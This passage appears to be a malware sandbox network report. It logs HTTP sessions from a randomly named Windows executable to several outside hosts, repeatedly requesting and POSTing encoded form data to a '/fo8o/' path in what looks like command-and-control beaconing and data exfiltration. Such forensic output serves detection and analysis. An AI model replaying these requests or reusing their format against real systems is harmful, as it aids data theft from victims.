LXN8foAD2fi2+6XdpFXTlAb08OkXYVy3T2zFUJqP/ic/54OhEflwYIgGCNHa0xouhuieOTsEX53hl7k6RUj+gkXp5Cu3+MpVQV3aqO1ZUp9WF1xfNy1ZqrPB2m6U9YSJR1cNzgRyM7Vo3xo3OeObcpYXhPl0lUg0qc5YNT73BhEKXxkc/wP7N6sojl/DTcsdpZgnfc1gQI2iGwx8sfZCGdjOVKcvA0Br8ZGbFgYA1ebCJMSFMJs9 [TRUNCATED]
Jun 8, 2024 18:16:37.934648037 CEST	367	IN	HTTP/1.1 404 Not Found Date: Sat, 08 Jun 2024 16:16:37 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49766	195.110.124.133	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:16:39.628598928 CEST	505	OUT	GET /fo8o/?qD=FrMTb&aZ=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.elettrosistemista.zip Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jun 8, 2024 18:16:40.905549049 CEST	367	IN	HTTP/1.1 404 Not Found Date: Sat, 08 Jun 2024 16:16:40 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Jun 8, 2024 18:16:40.905759096 CEST	367	IN	HTTP/1.1 404 Not Found Date: Sat, 08 Jun 2024 16:16:40 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49767	23.227.38.74	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:16:46.411818027 CEST	788	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.donnavariedades.com Origin: http://www.donnavariedades.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 199 Referer: http://www.donnavariedades.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 6f 38 66 55 32 74 6a 56 52 44 67 57 48 2b 6f 2f 67 47 49 7a 48 36 46 62 6c 68 36 44 37 74 4b 38 34 6c 70 7a 4d 43 52 30 78 63 75 62 75 42 75 42 77 68 55 38 72 79 4d 52 76 6a 32 35 57 55 30 58 39 66 32 77 62 51 64 6b 55 78 6c 43 4c 34 38 74 5a 65 6f 73 63 7a 2f 66 53 33 64 48 74 49 56 2f 6a 68 35 64 52 72 64 57 45 5a 4f 32 78 52 6f 55 44 34 72 66 58 55 68 54 2f 51 58 43 45 34 59 55 72 49 44 69 49 6d 7a 78 4a 65 67 30 37 31 48 64 44 6a 70 2f 78 39 47 31 6a 4e 38 33 4d 41 48 44 70 62 42 73 39 30 37 2b 33 2b 78 67 59 66 32 35 64 57 64 39 4f 6f 30 58 47 74 78 2b 55 6b 6c 71 6f 51 3d 3d Data Ascii: aZ=o8fU2tjVRDgWH+o/gGIzH6Fblh6D7tK84lpzMCR0xcubuBuBwhU8ryMRvj25WU0X9f2wbQdkUxlCL48tZeoscz/fS3dHtIV/jh5dRrdWEZO2xRoUD4rfXUhT/QXCE4YUrIDiImzxJeg071HdDjp/x9G1jN83MAHDpbBs907+3+xgYf25dWd9Oo0XGtx+UklqoQ==
Jun 8, 2024 18:16:47.083688021 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 08 Jun 2024 16:16:47 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Sorting-Hat-PodId: 311 X-Sorting-Hat-ShopId: 87850025272 Vary: Accept-Encoding x-frame-options: DENY x-shopid: 87850025272 x-shardid: 311 x-request-id: d8e5479f-7ae0-4263-8939-e953746e2d6a-1717863406 server-timing: processing;dur=11 content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=d8e5479f-7ae0-4263-8939-e953746e2d6a-1717863406 x-content-type-options: nosniff x-download-options: noopen x-permitted-cross-domain-policies: none x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=d8e5479f-7ae0-4263-8939-e953746e2d6a-1717863406 x-dc: gcp-us-south1,gcp-us-east1,gcp-us-east1 Content-Encoding: gzip CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sss%2FGLsanMgtwyuq%2B95o1mTNH%2B9w6UNdV9fM1xl Data Raw: Data Ascii:
Jun 8, 2024 18:16:47.083710909 CEST	1236	IN	Data Raw: 68 25 32 46 6f 43 37 46 33 42 54 6a 65 34 6c 37 45 66 4f 25 32 42 44 57 79 47 46 64 36 4d 47 33 53 38 58 6a 6f 45 41 65 74 67 65 59 71 25 32 42 5a 31 6d 30 78 4f 58 58 50 4e 53 74 76 42 52 33 68 78 70 75 37 52 31 6f 35 39 25 32 42 7a 78 6a 57 62 Data Ascii: h%2FoC7F3BTje4l7EfO%2BDWyGFd6MG3S8XjoEAetgeYq%2BZ1m0xOXXPNStvBR3hxpu7R1o59%2BzxjWbChV77RXAg%2BdM6d%2FkE3ps26qcYo"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequ
Jun 8, 2024 18:16:47.083729982 CEST	424	IN	Data Raw: 89 3c f4 1e 5c e4 5c c0 e5 af 27 25 af a8 07 e1 33 97 75 51 b1 23 1a a8 87 20 e9 ae 01 fa 86 c9 ce 00 d6 b0 73 71 6f 38 23 23 c9 15 22 85 df 84 06 a8 98 55 af 42 0e 7f 9e 0a bb 7a 26 a1 1a ce 88 81 5c ed 1e 19 3d 7d c9 1f d6 4e 08 97 57 12 22 9c Data Ascii: <\\'%3uQ# sqo8##"UBz&\=}NW":ZAk)<N> 0PbIaZkI{zF53yhU3z#QL<vf-k84@-X5i>pH{=qrs
Jun 8, 2024 18:16:47.083744049 CEST	422	IN	Data Raw: 09 46 de dd cc ac f9 ec 37 47 27 e2 07 9d 80 d3 54 7c f9 7e f5 e5 7b ac 52 c4 6c e9 d2 bb 76 e2 71 41 5d 36 bf 73 06 a7 4c 77 b7 ce 4d 11 28 1c fe 1d 24 70 3d 5b b8 f1 12 dd da 91 bf 4a 53 85 0f 3c dc 18 60 5a c0 64 18 28 10 43 8c ed 72 e6 c7 8a Data Ascii: F7G'T\|~{RlvqA]6sLwM($p=[JS<`Zd(Cr0 8A!R-Gnx=kA+uKs,9e8FwX\;VG-Igt"]r9$(:[Tw878pHAe\2v:<}.05VoVTKB@W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49768	23.227.38.74	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:16:48.965718985 CEST	808	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.donnavariedades.com Origin: http://www.donnavariedades.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 219 Referer: http://www.donnavariedades.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 6f 38 66 55 32 74 6a 56 52 44 67 57 42 75 59 2f 6a 6c 77 7a 41 61 46 63 37 52 36 44 77 4e 4c 33 34 6c 6c 7a 4d 44 6b 76 78 71 2b 62 76 67 65 42 68 51 55 38 71 79 4d 52 6e 44 33 7a 63 30 30 59 39 66 71 34 62 55 5a 6b 55 31 4e 43 4c 35 4d 74 5a 4e 41 76 63 6a 2f 64 48 6e 64 46 79 59 56 2f 6a 68 35 64 52 72 4a 38 45 5a 57 32 78 46 73 55 43 5a 72 63 4c 45 68 51 38 51 58 43 41 34 59 51 72 49 44 4d 49 69 71 61 4a 61 51 30 37 30 33 64 44 33 64 34 36 39 47 2f 74 74 39 61 66 44 2b 4f 6c 2b 67 45 79 58 58 47 38 2f 70 51 55 35 6e 6a 4d 6e 38 71 63 6f 51 6b 62 71 34 4b 5a 6e 59 6a 7a 52 65 71 67 6e 46 53 2b 47 2b 4f 6c 56 4a 33 44 74 42 46 38 58 55 3d Data Ascii: aZ=o8fU2tjVRDgWBuY/jlwzAaFc7R6DwNL34llzMDkvxq+bvgeBhQU8qyMRnD3zc00Y9fq4bUZkU1NCL5MtZNAvcj/dHndFyYV/jh5dRrJ8EZW2xFsUCZrcLEhQ8QXCA4YQrIDMIiqaJaQ0703dD3d469G/tt9afD+Ol+gEyXXG8/pQU5njMn8qcoQkbq4KZnYjzReqgnFS+G+OlVJ3DtBF8XU=
Jun 8, 2024 18:16:49.634478092 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 08 Jun 2024 16:16:49 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Sorting-Hat-PodId: 311 X-Sorting-Hat-ShopId: 87850025272 Vary: Accept-Encoding x-frame-options: DENY x-shopid: 87850025272 x-shardid: 311 x-request-id: d714b13d-a22d-4832-994f-3f1bd89886ff-1717863409 server-timing: processing;dur=15 content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=d714b13d-a22d-4832-994f-3f1bd89886ff-1717863409 x-content-type-options: nosniff x-download-options: noopen x-permitted-cross-domain-policies: none x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=d714b13d-a22d-4832-994f-3f1bd89886ff-1717863409 x-dc: gcp-us-south1,gcp-us-east1,gcp-us-east1 Content-Encoding: gzip CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A7Z71P9rfxImSVkcZGk8ytGQcxNlA22sAQZtzm65CQg1i Data Raw: Data Ascii:
Jun 8, 2024 18:16:49.634527922 CEST	212	IN	Data Raw: 63 6a 25 32 46 4b 56 55 37 43 4f 70 63 65 47 39 33 59 34 50 65 49 50 54 36 44 50 7a 59 4e 73 44 37 58 72 79 4d 56 46 6b 69 35 42 41 57 55 4c 69 57 65 37 61 72 51 62 53 69 58 4e 43 6b 48 44 54 55 43 45 65 45 69 33 7a 6e 6b 35 6e 31 4a 31 6a 75 4e Data Ascii: cj%2FKVU7COpceG93Y4PeIPT6DPzYNsD7XryMVFki5BAWULiWe7arQbSiXNCkHDTUCEeEi3znk5n1J1juNwst%2B5g3o%2BCw2d3"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Se
Jun 8, 2024 18:16:49.634566069 CEST	1236	IN	Data Raw: 72 76 65 72 2d 54 69 6d 69 6e 67 3a 20 63 66 52 65 71 75 65 73 74 44 75 72 61 74 69 6f 6e 3b 64 75 72 3d 37 39 2e 39 39 39 39 32 34 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 39 30 61 33 30 34 35 Data Ascii: rver-Timing: cfRequestDuration;dur=79.999924Server: cloudflareCF-RAY: 890a30455d7345e3-DFWalt-svc: h3=":443"; ma=864006b6Xo6S1tS,UNdh,jm'e)-Ak)>yr(jH[;u%=5
Jun 8, 2024 18:16:49.634605885 CEST	212	IN	Data Raw: e7 bc f5 f0 33 ce b7 42 6e 38 11 d5 d7 30 b0 74 0e 92 02 26 9b 2d 17 7b 18 eb d4 12 9e 4b fa ca 8b 71 e8 03 72 f0 e3 22 6f 11 65 c3 e6 b3 0b 2a 47 a5 a7 9a 48 18 e5 60 ae 3a 09 de ee de 3c d3 7c 47 1e a9 f8 98 da 18 47 a3 d6 24 49 3e aa f4 ac 96 Data Ascii: 3Bn80t&-{Kqr"oe*GH`:<\|GG$I>qi:{t46EGd EIhQzXeJ@Ntt2Ex2r1YNm0bZpL 5D
Jun 8, 2024 18:16:49.634638071 CEST	410	IN	Data Raw: 13 70 9a 8a 2f df 67 5f be c7 2a 45 cc 95 6e bd 6b 27 1e 0f d4 63 f3 3b 67 50 65 7a ba 75 6e 8a 40 e1 f0 ef 20 81 eb e9 c2 8d 57 e8 d6 ae fc 6c b9 54 f8 c0 87 1b 03 4c 0b d8 0c 0b 05 62 88 b1 3d 4e fd 58 b1 1a 86 61 03 40 9b 15 04 11 27 c8 32 2c Data Ascii: p/g_*Enk'c;gPezun@ WlTLb=NXa@'2,T[+^ZaJxijSct#k(%,^Kx\|<."`SEg[nF5"RM&#"Gn7@APmiAlAG$tlAOXX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49769	23.227.38.74	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:16:51.503086090 CEST	10890	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.donnavariedades.com Origin: http://www.donnavariedades.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10299 Referer: http://www.donnavariedades.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 6f 38 66 55 32 74 6a 56 52 44 67 57 42 75 59 2f 6a 6c 77 7a 41 61 46 63 37 52 36 44 77 4e 4c 33 34 6c 6c 7a 4d 44 6b 76 78 71 32 62 75 57 4b 42 77 44 4d 38 34 69 4d 52 6d 44 33 77 63 30 30 2f 39 66 69 38 62 52 41 52 55 7a 4a 43 4a 62 45 74 4d 4d 41 76 53 6a 2f 64 59 58 64 47 74 49 55 72 6a 68 4a 5a 52 72 5a 38 45 5a 57 32 78 44 41 55 46 49 72 63 4a 45 68 54 2f 51 58 30 45 34 5a 31 72 49 62 36 49 69 6e 68 49 70 59 30 31 33 66 64 41 43 70 34 6d 74 47 78 67 4e 39 43 66 43 44 4f 6c 36 49 6d 79 57 6a 67 38 2f 4e 51 43 65 61 4b 50 47 77 58 4a 4c 49 32 4d 70 45 2b 43 47 30 56 38 6a 75 43 70 6e 4e 55 39 55 36 6d 39 44 63 54 47 64 4e 75 6f 78 35 5a 2f 57 55 66 58 41 41 44 64 48 6e 4e 47 2b 62 57 39 71 43 2b 4d 35 46 79 33 72 65 72 30 4b 67 54 48 56 47 4e 7a 32 74 79 6a 56 79 30 44 51 41 59 67 73 57 55 33 73 34 6e 4c 33 53 71 6d 57 77 73 56 50 4d 32 6a 48 66 56 45 64 4b 39 7a 62 38 74 4a 78 31 59 4f 74 56 34 43 63 54 78 72 4c 49 4b 64 66 59 32 31 78 4d 34 6b 4d 77 6f 34 4e 6a 51 66 35 6d 4c 55 73 37 [TRUNCATED] Data Ascii: aZ=o8fU2tjVRDgWBuY/jlwzAaFc7R6DwNL34llzMDkvxq2buWKBwDM84iMRmD3wc00/9fi8bRARUzJCJbEtMMAvSj/dYXdGtIUrjhJZRrZ8EZW2xDAUFIrcJEhT/QX0E4Z1rIb6IinhIpY013fdACp4mtGxgN9CfCDOl6ImyWjg8/NQCeaKPGwXJLI2MpE+CG0V8juCpnNU9U6m9DcTGdNuox5Z/WUfXAADdHnNG+bW9qC+M5Fy3rer0KgTHVGNz2tyjVy0DQAYgsWU3s4nL3SqmWwsVPM2jHfVEdK9zb8tJx1YOtV4CcTxrLIKdfY21xM4kMwo4NjQf5mLUs7dYW597HmQn2Tv9O4/SS2ICmeGs9hrNHcyTAPg3k+91MxjqOZ2a2PJuuy1ps7OQ5+gIx+uxkBJmhEJud9x2yRABrtsRyVR08Fzr+CHCDbNgBGU+CIVCeug6+9B/vdEJQlsy8R5HvmLN01yHdG0iVnUJVPG3MertaEZxdTKPsAiaIxW0Y/xipNj+xXWE9QGsPBIufENbWD+wI++mY6/Rkh+LanFz0nQSJMIAd3smHCrwvbjxU21E5nd19c9yuLWezgILwI//W2rMVQEsw5cKmgUQzXR9YaQzKtT0/YliykuMAvgepG1+awt3neOu8bpmz8wUNhWI1vr71WYXsDNVFuPN4Mhf5oSAgFFkYiL6rNyK78uy72eZsS60RRMnOjsFirAcVReTKZJ40MIJc9M5holShPmbgsHkZR15a6t1uVbtPs6P+gkAD83m7PdT8uyDC1cIvvLbxNaJfzgWAbje4xr5cK39uLvMsbAZL0pfWNlDbR0l8KEcrGTr8qBnOMlIXqTiYayWGiqjxdSaamLN3ntLawNFQc6eMhOS8+grAuF7LPQh5hHcNIjolRTtcaqnD6b54y3uZDjUdC/+w6sj2yL9kMZFNxPr32C4iLLkpEcWCeYu9dwRKI2uG2RAUdRHufWOk4RCHaBvB4NW6wJQaZJJU7z/SoIf9mq3 [TRUNCATED]
Jun 8, 2024 18:16:52.171715975 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 08 Jun 2024 16:16:52 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Sorting-Hat-PodId: 311 X-Sorting-Hat-ShopId: 87850025272 Vary: Accept-Encoding x-frame-options: DENY x-shopid: 87850025272 x-shardid: 311 x-request-id: 4cd06dfc-6f14-450f-a33c-734bdb4b7bb8-1717863412 server-timing: processing;dur=18 content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=4cd06dfc-6f14-450f-a33c-734bdb4b7bb8-1717863412 x-content-type-options: nosniff x-download-options: noopen x-permitted-cross-domain-policies: none x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=4cd06dfc-6f14-450f-a33c-734bdb4b7bb8-1717863412 x-dc: gcp-us-south1,gcp-us-east1,gcp-us-east1 Content-Encoding: gzip CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZI9w82Q79pVkx9NzqQJ%2B8D4XhjL%2Be83%2FwwLYAP2 Data Raw: Data Ascii:
Jun 8, 2024 18:16:52.171741009 CEST	1236	IN	Data Raw: 62 35 25 32 42 25 32 42 72 79 57 43 54 35 51 63 37 77 45 6a 6c 7a 72 59 74 6b 54 4c 71 6b 79 57 4e 4e 31 4b 4d 43 44 57 75 5a 50 31 4c 57 25 32 46 6f 79 37 53 66 49 70 6c 4b 25 32 46 65 46 30 77 4b 65 55 32 66 46 6c 6f 6b 43 78 41 50 72 4d 46 39 Data Ascii: b5%2B%2BryWCT5Qc7wEjlzrYtkTLqkyWNN1KMCDWuZP1LW%2Foy7SfIplK%2FeF0wKeU2fFlokCxAPrMF91DLiZEj49qlav7IivI7BlZR4y9"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestD
Jun 8, 2024 18:16:52.171760082 CEST	424	IN	Data Raw: c8 b9 80 c7 5f 6f 0a 5e 52 0f c2 67 1e eb bc 64 07 d4 53 f7 41 d2 53 03 cc 0d a3 9b 1e ac fe e6 ec 5d 5f 23 03 c9 05 22 85 df 88 06 a8 98 55 af 42 0e ff 3c 15 76 f5 99 84 6a 39 21 06 72 75 7b 60 f4 f8 2d 7f 58 39 21 3c 5e 49 88 f0 dc 41 30 9a 74 Data Ascii: _o^RgdSAS]_#"UB<vj9!ru{`-X9!<^IA0tWNGz_IfAp<#qkHsr%,WtHUaHB*WGIaxjxC5AVR=F%0hk23}SRiN8D:Hl6\
Jun 8, 2024 18:16:52.171775103 CEST	418	IN	Data Raw: 66 4d 77 bf 3b 3a 11 ef 74 02 8e 53 f1 e5 cd f2 db 1b ac 52 c4 5c e9 d6 bb 72 e2 e1 40 3d 36 7f 70 06 55 a6 a7 5b e7 2a 0f 14 0e ff 0e 12 b8 9e ce dc 78 81 ae ed ca 5f ce e7 0a 1f f8 70 63 80 69 06 9b 7e a1 40 0c 31 b6 c7 a9 1f 2b 56 c3 d0 6f 00 Data Ascii: fMw;:tSR\r@=6pU[x_pci~@1+Voh Y9j9zqm]0X+/MYspnc1AvrXE /`{.g>;0l omS\qJZA)"n>9xdvyya\|+toVtsB@{j

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49770	23.227.38.74	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:16:54.032572985 CEST	503	OUT	GET /fo8o/?aZ=l+301ZvITCxaX9AA4lYSKJRm7SqH4t3JgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pFAmOdnck9fouhB1RUuBib5vZojQkCZCqKk0=&qD=FrMTb HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.donnavariedades.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jun 8, 2024 18:16:54.673671007 CEST	1236	IN	HTTP/1.1 301 Moved Permanently Date: Sat, 08 Jun 2024 16:16:54 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Sorting-Hat-PodId: 311 X-Sorting-Hat-ShopId: 87850025272 X-Storefront-Renderer-Rendered: 1 location: https://donnavariedades.com/fo8o?aZ=l+301ZvITCxaX9AA4lYSKJRm7SqH4t3JgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pFAmOdnck9fouhB1RUuBib5vZojQkCZCqKk0=&qD=FrMTb x-redirect-reason: https_required x-frame-options: DENY content-security-policy: frame-ancestors 'none'; x-shopid: 87850025272 x-shardid: 311 vary: Accept powered-by: Shopify server-timing: processing;dur=11, db;dur=5, asn;desc="8100", edge;desc="DFW", country;desc="US", pageType;desc="404", servedBy;desc="zwqc", requestID;desc="4ea5a3ec-b95f-4ceb-bd79-bc3c9e8fa29e-1717863414" x-dc: gcp-us-south1,gcp-us-central1,gcp-us-central1 x-request-id: 4ea5a3ec-b95f-4ceb-bd79-bc3c9e8fa29e-1717863414 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xn3hbOjhSFp8B6d2ylAerx9uE%2Bqq2jWGB4Wi%2BV2%2FRV3NSl9Pm9cNv%2FuzmkYdJl2qkqGzBavhOk1P7MjQN0zdGF%2BtCJiEvL57Qeqg9Mi%2FknWM6%2F2r1fAGAJUN9BqiXM%2BMIqDnhVs5VSbK"}],"group":"cf-nel","max_age":604800} NE Data Raw: Data Ascii:
Jun 8, 2024 18:16:54.673696041 CEST	337	IN	Data Raw: 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 31 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 2d 54 69 6d 69 6e 67 3a 20 Data Ascii: : {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=51.000118X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Download-Options: n

